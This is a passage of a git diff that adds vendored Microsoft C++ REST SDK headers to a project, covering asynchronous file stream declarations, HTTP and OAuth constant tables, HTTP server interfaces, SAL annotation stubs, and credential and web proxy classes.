=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifdef _WIN32 +#include +#endif + +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" + +namespace Concurrency +{ +namespace streams +{ +namespace details +{ +/// +/// A record containing the essential private data members of a file stream, +/// in particular the parts that need to be shared between the public header +/// file and the implementation in the implementation file. +/// +struct _file_info +{ + _ASYNCRTIMP _file_info(std::ios_base::openmode mode, size_t buffer_size) + : m_rdpos(0) + , m_wrpos(0) + , m_atend(false) + , m_buffer_size(buffer_size) + , m_buffer(nullptr) + , m_bufoff(0) + , m_bufsize(0) + , m_buffill(0) + , m_mode(mode) + { + } + + // Positional data + + size_t m_rdpos; + size_t m_wrpos; + bool m_atend; + + // Input buffer + + size_t m_buffer_size; // The intended size of the buffer to read into. + char* m_buffer; + + size_t m_bufoff; // File position that the start of the buffer represents. + msl::safeint3::SafeInt m_bufsize; // Buffer allocated size, as actually allocated. + size_t m_buffill; // Amount of file data actually in the buffer + + std::ios_base::openmode m_mode; + + pplx::extensibility::recursive_lock_t m_lock; +}; + +/// +/// This interface provides the necessary callbacks for completion events. +/// +class _filestream_callback +{ +public: + virtual void on_opened(_In_ details::_file_info*) {} + virtual void on_closed() {} + virtual void on_error(const std::exception_ptr&) {} + virtual void on_completed(size_t) {} + +protected: + virtual ~_filestream_callback() {} +}; + +} // namespace details +} // namespace streams +} // namespace Concurrency + +extern "C" +{ +/// +/// Open a file and create a streambuf instance to represent it. +/// +/// A pointer to the callback interface to invoke when the file has been opened. +/// The name of the file to open +/// A creation mode for the stream buffer +/// A file protection mode to use for the file stream (not supported on Linux) +/// true if the opening operation could be initiated, false otherwise. +/// +/// True does not signal that the file will eventually be successfully opened, just that the process was started. +/// +#if !defined(__cplusplus_winrt) + _ASYNCRTIMP bool __cdecl _open_fsb_str(_In_ concurrency::streams::details::_filestream_callback* callback, + const utility::char_t* filename, + std::ios_base::openmode mode, + int prot); +#endif + +/// +/// Create a streambuf instance to represent a WinRT file. +/// +/// A pointer to the callback interface to invoke when the file has been opened. +/// The file object +/// A creation mode for the stream buffer +/// true if the opening operation could be initiated, false otherwise. +/// +/// True does not signal that the file will eventually be successfully opened, just that the process was started. +/// This is only available for WinRT. +/// +#if defined(__cplusplus_winrt) + _ASYNCRTIMP bool __cdecl _open_fsb_stf_str(_In_ concurrency::streams::details::_filestream_callback* callback, + ::Windows::Storage::StorageFile ^ file, + std::ios_base::openmode mode, + int prot); +#endif + + /// + /// Close a file stream buffer. + /// + /// The file info record of the file + /// A pointer to the callback interface to invoke when the file has been opened. + /// true if the closing operation could be initiated, false otherwise. + /// + /// True does not signal that the file will eventually be successfully closed, just that the process was started. + /// + _ASYNCRTIMP bool __cdecl _close_fsb_nolock(_In_ concurrency::streams::details::_file_info** info, + _In_ concurrency::streams::details::_filestream_callback* callback); + _ASYNCRTIMP bool __cdecl _close_fsb(_In_ concurrency::streams::details::_file_info** info, + _In_ concurrency::streams::details::_filestream_callback* callback); + + /// + /// Write data from a buffer into the file stream. + /// + /// The file info record of the file + /// A pointer to the callback interface to invoke when the write request is + /// completed. A pointer to a buffer where the data should be placed The size (in characters) of the buffer 0 if the read request is still outstanding, + /// -1 if the request failed, otherwise the size of the data read into the buffer + _ASYNCRTIMP size_t __cdecl _putn_fsb(_In_ concurrency::streams::details::_file_info* info, + _In_ concurrency::streams::details::_filestream_callback* callback, + const void* ptr, + size_t count, + size_t char_size); + + /// + /// Read data from a file stream into a buffer + /// + /// The file info record of the file + /// A pointer to the callback interface to invoke when the write request is + /// completed. A pointer to a buffer where the data should be placed The size (in characters) of the buffer 0 if the read request is still outstanding, + /// -1 if the request failed, otherwise the size of the data read into the buffer + _ASYNCRTIMP size_t __cdecl _getn_fsb(_In_ concurrency::streams::details::_file_info* info, + _In_ concurrency::streams::details::_filestream_callback* callback, + _Out_writes_(count) void* ptr, + _In_ size_t count, + size_t char_size); + + /// + /// Flush all buffered data to the underlying file. + /// + /// The file info record of the file + /// A pointer to the callback interface to invoke when the write request is + /// completed. true if the request was initiated + _ASYNCRTIMP bool __cdecl _sync_fsb(_In_ concurrency::streams::details::_file_info* info, + _In_ concurrency::streams::details::_filestream_callback* callback); + + /// + /// Get the size of the underlying file. + /// + /// The file info record of the file + /// The file size + _ASYNCRTIMP utility::size64_t __cdecl _get_size(_In_ concurrency::streams::details::_file_info* info, + size_t char_size); + + /// + /// Adjust the internal buffers and pointers when the application seeks to a new read location in the stream. + /// + /// The file info record of the file + /// The new position (offset from the start) in the file stream + /// true if the request was initiated + _ASYNCRTIMP size_t __cdecl _seekrdpos_fsb(_In_ concurrency::streams::details::_file_info* info, + size_t pos, + size_t char_size); + + /// + /// Adjust the internal buffers and pointers when the application seeks to a new read location in the stream. + /// + /// The file info record of the file + /// The new position (offset from the start) in the file stream + /// true if the request was initiated + _ASYNCRTIMP size_t __cdecl _seekrdtoend_fsb(_In_ concurrency::streams::details::_file_info* info, + int64_t offset, + size_t char_size); + + /// + /// Adjust the internal buffers and pointers when the application seeks to a new write location in the stream. + /// + /// The file info record of the file + /// The new position (offset from the start) in the file stream + /// true if the request was initiated + _ASYNCRTIMP size_t __cdecl _seekwrpos_fsb(_In_ concurrency::streams::details::_file_info* info, + size_t pos, + size_t char_size); +} diff --git a/Src/Common/CppRestSdk/include/cpprest/details/http_constants.dat b/Src/Common/CppRestSdk/include/cpprest/details/http_constants.dat new file mode 100644 index 0000000..372f860 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/http_constants.dat @@ -0,0 +1,198 @@ +#ifdef _METHODS +DAT(GET, _XPLATSTR("GET")) +DAT(POST, _XPLATSTR("POST")) +DAT(PUT, _XPLATSTR("PUT")) +DAT(DEL, _XPLATSTR("DELETE")) +DAT(HEAD, _XPLATSTR("HEAD")) +DAT(OPTIONS, _XPLATSTR("OPTIONS")) +DAT(TRCE, _XPLATSTR("TRACE")) +DAT(CONNECT, _XPLATSTR("CONNECT")) +DAT(MERGE, _XPLATSTR("MERGE")) +DAT(PATCH, _XPLATSTR("PATCH")) +#endif + +#ifdef _PHRASES +DAT(Continue, 100, _XPLATSTR("Continue")) +DAT(SwitchingProtocols, 101, _XPLATSTR("Switching Protocols")) +DAT(OK, 200, _XPLATSTR("OK")) +DAT(Created, 201, _XPLATSTR("Created")) +DAT(Accepted, 202, _XPLATSTR("Accepted")) +DAT(NonAuthInfo, 203, _XPLATSTR("Non-Authoritative Information")) +DAT(NoContent, 204, _XPLATSTR("No Content")) +DAT(ResetContent, 205, _XPLATSTR("Reset Content")) +DAT(PartialContent, 206, _XPLATSTR("Partial Content")) +DAT(MultiStatus, 207, _XPLATSTR("Multi-Status")) +DAT(AlreadyReported, 208, _XPLATSTR("Already Reported")) +DAT(IMUsed, 226, _XPLATSTR("IM Used")) +DAT(MultipleChoices, 300, _XPLATSTR("Multiple Choices")) +DAT(MovedPermanently, 301, _XPLATSTR("Moved Permanently")) +DAT(Found, 302, _XPLATSTR("Found")) +DAT(SeeOther, 303, _XPLATSTR("See Other")) +DAT(NotModified, 304, _XPLATSTR("Not Modified")) +DAT(UseProxy, 305, _XPLATSTR("Use Proxy")) +DAT(TemporaryRedirect, 307, _XPLATSTR("Temporary Redirect")) +DAT(PermanentRedirect, 308, _XPLATSTR("Permanent Redirect")) +DAT(BadRequest, 400, _XPLATSTR("Bad Request")) +DAT(Unauthorized, 401, _XPLATSTR("Unauthorized")) +DAT(PaymentRequired, 402, _XPLATSTR("Payment Required")) +DAT(Forbidden, 403, _XPLATSTR("Forbidden")) +DAT(NotFound, 404, _XPLATSTR("Not Found")) +DAT(MethodNotAllowed, 405, _XPLATSTR("Method Not Allowed")) +DAT(NotAcceptable, 406, _XPLATSTR("Not Acceptable")) +DAT(ProxyAuthRequired, 407, _XPLATSTR("Proxy Authentication Required")) +DAT(RequestTimeout, 408, _XPLATSTR("Request Time-out")) +DAT(Conflict, 409, _XPLATSTR("Conflict")) +DAT(Gone, 410, _XPLATSTR("Gone")) +DAT(LengthRequired, 411, _XPLATSTR("Length Required")) +DAT(PreconditionFailed, 412, _XPLATSTR("Precondition Failed")) +DAT(RequestEntityTooLarge, 413, _XPLATSTR("Request Entity Too Large")) +DAT(RequestUriTooLarge, 414, _XPLATSTR("Request Uri Too Large")) +DAT(UnsupportedMediaType, 415, _XPLATSTR("Unsupported Media Type")) +DAT(RangeNotSatisfiable, 416, _XPLATSTR("Requested range not satisfiable")) +DAT(ExpectationFailed, 417, _XPLATSTR("Expectation Failed")) +DAT(MisdirectedRequest, 421, _XPLATSTR("Misdirected Request")) +DAT(UnprocessableEntity, 422, _XPLATSTR("Unprocessable Entity")) +DAT(Locked, 423, _XPLATSTR("Locked")) +DAT(FailedDependency, 424, _XPLATSTR("Failed Dependency")) +DAT(UpgradeRequired, 426, _XPLATSTR("Upgrade Required")) +DAT(PreconditionRequired, 428, _XPLATSTR("Precondition Required")) +DAT(TooManyRequests, 429, _XPLATSTR("Too Many Requests")) +DAT(RequestHeaderFieldsTooLarge, 431, _XPLATSTR("Request Header Fields Too Large")) +DAT(UnavailableForLegalReasons, 451, _XPLATSTR("Unavailable For Legal Reasons")) +DAT(InternalError, 500, _XPLATSTR("Internal Error")) +DAT(NotImplemented, 501, _XPLATSTR("Not Implemented")) +DAT(BadGateway, 502, _XPLATSTR("Bad Gateway")) +DAT(ServiceUnavailable, 503, _XPLATSTR("Service Unavailable")) +DAT(GatewayTimeout, 504, _XPLATSTR("Gateway Time-out")) +DAT(HttpVersionNotSupported, 505, _XPLATSTR("HTTP Version not supported")) +DAT(VariantAlsoNegotiates, 506, _XPLATSTR("Variant Also Negotiates")) +DAT(InsufficientStorage, 507, _XPLATSTR("Insufficient Storage")) +DAT(LoopDetected, 508, _XPLATSTR("Loop Detected")) +DAT(NotExtended, 510, _XPLATSTR("Not Extended")) +DAT(NetworkAuthenticationRequired, 511, _XPLATSTR("Network Authentication Required")) +#endif // _PHRASES + +#ifdef _HEADER_NAMES +DAT(accept, "Accept") +DAT(accept_charset, "Accept-Charset") +DAT(accept_encoding, "Accept-Encoding") +DAT(accept_language, "Accept-Language") +DAT(accept_ranges, "Accept-Ranges") +DAT(access_control_allow_origin, "Access-Control-Allow-Origin") +DAT(age, "Age") +DAT(allow, "Allow") +DAT(authorization, "Authorization") +DAT(cache_control, "Cache-Control") +DAT(connection, "Connection") +DAT(content_encoding, "Content-Encoding") +DAT(content_language, "Content-Language") +DAT(content_length, "Content-Length") +DAT(content_location, "Content-Location") +DAT(content_md5, "Content-MD5") +DAT(content_range, "Content-Range") +DAT(content_type, "Content-Type") +DAT(content_disposition, "Content-Disposition") +DAT(date, "Date") +DAT(etag, "ETag") +DAT(expect, "Expect") +DAT(expires, "Expires") +DAT(from, "From") +DAT(host, "Host") +DAT(if_match, "If-Match") +DAT(if_modified_since, "If-Modified-Since") +DAT(if_none_match, "If-None-Match") +DAT(if_range, "If-Range") +DAT(if_unmodified_since, "If-Unmodified-Since") +DAT(last_modified, "Last-Modified") +DAT(location, "Location") +DAT(max_forwards, "Max-Forwards") +DAT(pragma, "Pragma") +DAT(proxy_authenticate, "Proxy-Authenticate") +DAT(proxy_authorization, "Proxy-Authorization") +DAT(range, "Range") +DAT(referer, "Referer") +DAT(retry_after, "Retry-After") +DAT(server, "Server") +DAT(te, "TE") +DAT(trailer, "Trailer") +DAT(transfer_encoding, "Transfer-Encoding") +DAT(upgrade, "Upgrade") +DAT(user_agent, "User-Agent") +DAT(vary, "Vary") +DAT(via, "Via") +DAT(warning, "Warning") +DAT(www_authenticate, "WWW-Authenticate") +#endif // _HEADER_NAMES + +#ifdef _MIME_TYPES +DAT(application_atom_xml, "application/atom+xml") +DAT(application_http, "application/http") +DAT(application_javascript, "application/javascript") +DAT(application_json, "application/json") +DAT(application_xjson, "application/x-json") +DAT(application_octetstream, "application/octet-stream") +DAT(application_x_www_form_urlencoded, "application/x-www-form-urlencoded") +DAT(multipart_form_data, "multipart/form-data") +DAT(boundary, "boundary") +DAT(form_data, "form-data") +DAT(application_xjavascript, "application/x-javascript") +DAT(application_xml, "application/xml") +DAT(message_http, "message/http") +DAT(text, "text") +DAT(text_javascript, "text/javascript") +DAT(text_json, "text/json") +DAT(text_plain, "text/plain") +DAT(text_plain_utf16, "text/plain; charset=utf-16") +DAT(text_plain_utf16le, "text/plain; charset=utf-16le") +DAT(text_plain_utf8, "text/plain; charset=utf-8") +DAT(text_xjavascript, "text/x-javascript") +DAT(text_xjson, "text/x-json") +#endif // _MIME_TYPES + +#ifdef _CHARSET_TYPES +DAT(ascii, "ascii") +DAT(usascii, "us-ascii") +DAT(latin1, "iso-8859-1") +DAT(utf8, "utf-8") +DAT(utf16, "utf-16") +DAT(utf16le, "utf-16le") +DAT(utf16be, "utf-16be") +#endif // _CHARSET_TYPES + +#ifdef _OAUTH1_METHODS +DAT(hmac_sha1, _XPLATSTR("HMAC-SHA1")) +DAT(plaintext, _XPLATSTR("PLAINTEXT")) +#endif // _OAUTH1_METHODS + +#ifdef _OAUTH1_STRINGS +DAT(callback, "oauth_callback") +DAT(callback_confirmed, "oauth_callback_confirmed") +DAT(consumer_key, "oauth_consumer_key") +DAT(nonce, "oauth_nonce") +DAT(realm, "realm") // NOTE: No "oauth_" prefix. +DAT(signature, "oauth_signature") +DAT(signature_method, "oauth_signature_method") +DAT(timestamp, "oauth_timestamp") +DAT(token, "oauth_token") +DAT(token_secret, "oauth_token_secret") +DAT(verifier, "oauth_verifier") +DAT(version, "oauth_version") +#endif // _OAUTH1_STRINGS + +#ifdef _OAUTH2_STRINGS +DAT(access_token, "access_token") +DAT(authorization_code, "authorization_code") +DAT(bearer, "bearer") +DAT(client_id, "client_id") +DAT(client_secret, "client_secret") +DAT(code, "code") +DAT(expires_in, "expires_in") +DAT(grant_type, "grant_type") +DAT(redirect_uri, "redirect_uri") +DAT(refresh_token, "refresh_token") +DAT(response_type, "response_type") +DAT(scope, "scope") +DAT(state, "state") +DAT(token, "token") +DAT(token_type, "token_type") +#endif // _OAUTH2_STRINGS diff --git a/Src/Common/CppRestSdk/include/cpprest/details/http_helpers.h b/Src/Common/CppRestSdk/include/cpprest/details/http_helpers.h new file mode 100644 index 0000000..7a3f5fe --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/http_helpers.h @@ -0,0 +1,48 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Implementation Details of the http.h layer of messaging + * + * Functions and types for interoperating with http.h from modern C++ + * This file includes windows definitions and should not be included in a public header + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" +#include "Common/CppRestSdk/include/cpprest/http_msg.h" + +namespace web +{ +namespace http +{ +namespace details +{ +namespace chunked_encoding +{ +// Transfer-Encoding: chunked support +static const size_t additional_encoding_space = 12; +static const size_t data_offset = additional_encoding_space - 2; + +// Add the data necessary for properly sending data with transfer-encoding: chunked. +// +// There are up to 12 additional bytes needed for each chunk: +// +// The last chunk requires 5 bytes, and is fixed. +// All other chunks require up to 8 bytes for the length, and four for the two CRLF +// delimiters. +// +_ASYNCRTIMP size_t __cdecl add_chunked_delimiters(_Out_writes_(buffer_size) uint8_t* data, + _In_ size_t buffer_size, + size_t bytes_read); +} // namespace chunked_encoding + +} // namespace details +} // namespace http +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/details/http_server.h b/Src/Common/CppRestSdk/include/cpprest/details/http_server.h new file mode 100644 index 0000000..a32b8a7 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/http_server.h @@ -0,0 +1,72 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: interface to implement HTTP server to service http_listeners. + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#if _WIN32_WINNT < _WIN32_WINNT_VISTA +#error "Error: http server APIs are not supported in XP" +#endif //_WIN32_WINNT < _WIN32_WINNT_VISTA + +#include "Common/CppRestSdk/include/cpprest/http_listener.h" + +namespace web +{ +namespace http +{ +namespace experimental +{ +namespace details +{ +/// +/// Interface http listeners interact with for receiving and responding to http requests. +/// +class http_server +{ +public: + /// + /// Release any held resources. + /// + virtual ~http_server() {}; + + /// + /// Start listening for incoming requests. + /// + virtual pplx::task start() = 0; + + /// + /// Registers an http listener. + /// + virtual pplx::task register_listener( + _In_ web::http::experimental::listener::details::http_listener_impl* pListener) = 0; + + /// + /// Unregisters an http listener. + /// + virtual pplx::task unregister_listener( + _In_ web::http::experimental::listener::details::http_listener_impl* pListener) = 0; + + /// + /// Stop processing and listening for incoming requests. + /// + virtual pplx::task stop() = 0; + + /// + /// Asynchronously sends the specified http response. + /// + /// The http_response to send. + /// A operation which is completed once the response has been sent. + virtual pplx::task respond(http::http_response response) = 0; +}; + +} // namespace details +} // namespace experimental +} // namespace http +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/details/http_server_api.h b/Src/Common/CppRestSdk/include/cpprest/details/http_server_api.h new file mode 100644 index 0000000..9482b02 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/http_server_api.h @@ -0,0 +1,93 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: exposes the entry points to the http server transport apis. + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#if _WIN32_WINNT < _WIN32_WINNT_VISTA +#error "Error: http server APIs are not supported in XP" +#endif //_WIN32_WINNT < _WIN32_WINNT_VISTA + +#include "Common/CppRestSdk/include/cpprest/http_listener.h" +#include + +namespace web +{ +namespace http +{ +namespace experimental +{ +namespace details +{ +class http_server; + +/// +/// Singleton class used to register for http requests and send responses. +/// +/// The lifetime is tied to http listener registration. When the first listener registers an instance is created +/// and when the last one unregisters the receiver stops and is destroyed. It can be started back up again if +/// listeners are again registered. +/// +class http_server_api +{ +public: + /// + /// Returns whether or not any listeners are registered. + /// + static bool __cdecl has_listener(); + + /// + /// Registers a HTTP server API. + /// + static void __cdecl register_server_api(std::unique_ptr server_api); + + /// + /// Clears the http server API. + /// + static void __cdecl unregister_server_api(); + + /// + /// Registers a listener for HTTP requests and starts receiving. + /// + static pplx::task __cdecl register_listener( + _In_ web::http::experimental::listener::details::http_listener_impl* pListener); + + /// + /// Unregisters the given listener and stops listening for HTTP requests. + /// + static pplx::task __cdecl unregister_listener( + _In_ web::http::experimental::listener::details::http_listener_impl* pListener); + + /// + /// Gets static HTTP server API. Could be null if no registered listeners. + /// + static http_server* __cdecl server_api(); + +private: + /// Used to lock access to the server api registration + static pplx::extensibility::critical_section_t s_lock; + + /// Registers a server API set -- this assumes the lock has already been taken + static void unsafe_register_server_api(std::unique_ptr server_api); + + // Static instance of the HTTP server API. + static std::unique_ptr s_server_api; + + /// Number of registered listeners; + static pplx::details::atomic_long s_registrations; + + // Static only class. No creation. + http_server_api(); +}; + +} // namespace details +} // namespace experimental +} // namespace http +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/details/nosal.h b/Src/Common/CppRestSdk/include/cpprest/details/nosal.h new file mode 100644 index 0000000..91a2dd8 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/nosal.h @@ -0,0 +1,77 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + ***/ + +#pragma once +// selected MS SAL annotations + +#ifdef _In_ +#undef _In_ +#endif +#define _In_ + +#ifdef _Inout_ +#undef _Inout_ +#endif +#define _Inout_ + +#ifdef _Out_ +#undef _Out_ +#endif +#define _Out_ + +#ifdef _In_z_ +#undef _In_z_ +#endif +#define _In_z_ + +#ifdef _Out_z_ +#undef _Out_z_ +#endif +#define _Out_z_ + +#ifdef _Inout_z_ +#undef _Inout_z_ +#endif +#define _Inout_z_ + +#ifdef _In_opt_ +#undef _In_opt_ +#endif +#define _In_opt_ + +#ifdef _Out_opt_ +#undef _Out_opt_ +#endif +#define _Out_opt_ + +#ifdef _Inout_opt_ +#undef _Inout_opt_ +#endif +#define _Inout_opt_ + +#ifdef _Out_writes_ +#undef _Out_writes_ +#endif +#define _Out_writes_(x) + +#ifdef _Out_writes_opt_ +#undef _Out_writes_opt_ +#endif +#define _Out_writes_opt_(x) + +#ifdef _In_reads_ +#undef _In_reads_ +#endif +#define _In_reads_(x) + +#ifdef _Inout_updates_bytes_ +#undef _Inout_updates_bytes_ +#endif +#define _Inout_updates_bytes_(x) diff --git a/Src/Common/CppRestSdk/include/cpprest/details/resource.h b/Src/Common/CppRestSdk/include/cpprest/details/resource.h new file mode 100644 index 0000000..2d61283 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/resource.h @@ -0,0 +1,14 @@ +//{{NO_DEPENDENCIES}} +// Microsoft Visual C++ generated include file. +// Used by Resource.rc + +// Next default values for new objects +// +#ifdef APSTUDIO_INVOKED +#ifndef APSTUDIO_READONLY_SYMBOLS +#define _APS_NEXT_RESOURCE_VALUE 101 +#define _APS_NEXT_COMMAND_VALUE 40001 +#define _APS_NEXT_CONTROL_VALUE 1001 +#define _APS_NEXT_SYMED_VALUE 101 +#endif +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/details/web_utilities.h b/Src/Common/CppRestSdk/include/cpprest/details/web_utilities.h new file mode 100644 index 0000000..19c44e3 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/web_utilities.h @@ -0,0 +1,223 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * utility classes used by the different web:: clients + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/uri.h" + +namespace web +{ +namespace details +{ +class zero_memory_deleter +{ +public: + _ASYNCRTIMP void operator()(::utility::string_t* data) const; +}; +typedef std::unique_ptr<::utility::string_t, zero_memory_deleter> plaintext_string; + +#if defined(_WIN32) && !defined(CPPREST_TARGET_XP) +#if defined(__cplusplus_winrt) +class winrt_encryption +{ +public: + winrt_encryption() {} + _ASYNCRTIMP winrt_encryption(const std::wstring& data); + _ASYNCRTIMP plaintext_string decrypt() const; + +private: + ::pplx::task m_buffer; +}; +#else +class win32_encryption +{ +public: + win32_encryption() {} + _ASYNCRTIMP win32_encryption(const std::wstring& data); + _ASYNCRTIMP ~win32_encryption(); + _ASYNCRTIMP plaintext_string decrypt() const; + +private: + std::vector m_buffer; + size_t m_numCharacters; +}; +#endif +#endif +} // namespace details + +/// +/// Represents a set of user credentials (user name and password) to be used +/// for authentication. +/// +class credentials +{ +public: + /// + /// Constructs an empty set of credentials without a user name or password. + /// + credentials() {} + + /// + /// Constructs credentials from given user name and password. + /// + /// User name as a string. + /// Password as a string. + credentials(utility::string_t username, const utility::string_t& password) + : m_username(std::move(username)), m_password(password) + { + } + + /// + /// The user name associated with the credentials. + /// + /// A string containing the user name. + const utility::string_t& username() const { return m_username; } + + /// + /// The password for the user name associated with the credentials. + /// + /// A string containing the password. + CASABLANCA_DEPRECATED( + "This API is deprecated for security reasons to avoid unnecessary password copies stored in plaintext.") + utility::string_t password() const + { +#if defined(_WIN32) && !defined(CPPREST_TARGET_XP) + return utility::string_t(*m_password.decrypt()); +#else + return m_password; +#endif + } + + /// + /// Checks if credentials have been set + /// + /// true if user name and password is set, false otherwise. + bool is_set() const { return !m_username.empty(); } + + details::plaintext_string _internal_decrypt() const + { + // Encryption APIs not supported on XP +#if defined(_WIN32) && !defined(CPPREST_TARGET_XP) + return m_password.decrypt(); +#else + return details::plaintext_string(new ::utility::string_t(m_password)); +#endif + } + +private: + ::utility::string_t m_username; + +#if defined(_WIN32) && !defined(CPPREST_TARGET_XP) +#if defined(__cplusplus_winrt) + details::winrt_encryption m_password; +#else + details::win32_encryption m_password; +#endif +#else + ::utility::string_t m_password; +#endif +}; + +/// +/// web_proxy represents the concept of the web proxy, which can be auto-discovered, +/// disabled, or specified explicitly by the user. +/// +class web_proxy +{ + enum web_proxy_mode_internal + { + use_default_, + use_auto_discovery_, + disabled_, + user_provided_ + }; + +public: + enum web_proxy_mode + { + use_default = use_default_, + use_auto_discovery = use_auto_discovery_, + disabled = disabled_ + }; + + /// + /// Constructs a proxy with the default settings. + /// + web_proxy() : m_address(_XPLATSTR("")), m_mode(use_default_) {} + + /// + /// Creates a proxy with specified mode. + /// + /// Mode to use. + web_proxy(web_proxy_mode mode) : m_address(_XPLATSTR("")), m_mode(static_cast(mode)) {} + + /// + /// Creates a proxy explicitly with provided address. + /// + /// Proxy URI to use. + web_proxy(uri address) : m_address(address), m_mode(user_provided_) {} + + /// + /// Gets this proxy's URI address. Returns an empty URI if not explicitly set by user. + /// + /// A reference to this proxy's URI. + const uri& address() const { return m_address; } + + /// + /// Gets the credentials used for authentication with this proxy. + /// + /// Credentials to for this proxy. + const web::credentials& credentials() const { return m_credentials; } + + /// + /// Sets the credentials to use for authentication with this proxy. + /// + /// Credentials to use for this proxy. + void set_credentials(web::credentials cred) + { + if (m_mode == disabled_) + { + throw std::invalid_argument("Cannot attach credentials to a disabled proxy"); + } + m_credentials = std::move(cred); + } + + /// + /// Checks if this proxy was constructed with default settings. + /// + /// True if default, false otherwise. + bool is_default() const { return m_mode == use_default_; } + + /// + /// Checks if using a proxy is disabled. + /// + /// True if disabled, false otherwise. + bool is_disabled() const { return m_mode == disabled_; } + + /// + /// Checks if the auto discovery protocol, WPAD, is to be used. + /// + /// True if auto discovery enabled, false otherwise. + bool is_auto_discovery() const { return m_mode == use_auto_discovery_; } + + /// + /// Checks if a proxy address is explicitly specified by the user. + /// + /// True if a proxy address was explicitly specified, false otherwise. + bool is_specified() const { return m_mode == user_provided_; } + +private: + web::uri m_address; + web_proxy_mode_internal m_mode; + web::credentials m_credentials; +}; + +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/filestream.h b/Src/Common/CppRestSdk/include/cpprest/filestream.h new file mode 100644 index 0000000..7df11a2 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/filestream.h @@ -0,0 +1,1094 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Asynchronous File streams + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_FILE_STREAMS_H +#define CASA_FILE_STREAMS_H + +#include "Common/CppRestSdk/include/cpprest/astreambuf.h" +#include "Common/CppRestSdk/include/cpprest/details/fileio.h" +#include "Common/CppRestSdk/include/cpprest/streams.h" +#include + +#ifndef _CONCRT_H +#ifndef _LWRCASE_CNCRRNCY +#define _LWRCASE_CNCRRNCY +// Note to reader: we're using lower-case namespace names everywhere, but the 'Concurrency' namespace +// is capitalized for historical reasons. The alias let's us pretend that style issue doesn't exist. +namespace Concurrency +{ +} +namespace concurrency = Concurrency; +#endif +#endif + +namespace Concurrency +{ +namespace streams +{ +// Forward declarations +template +class file_buffer; + +namespace details +{ +// This operation queue is NOT thread safe +class async_operation_queue +{ + 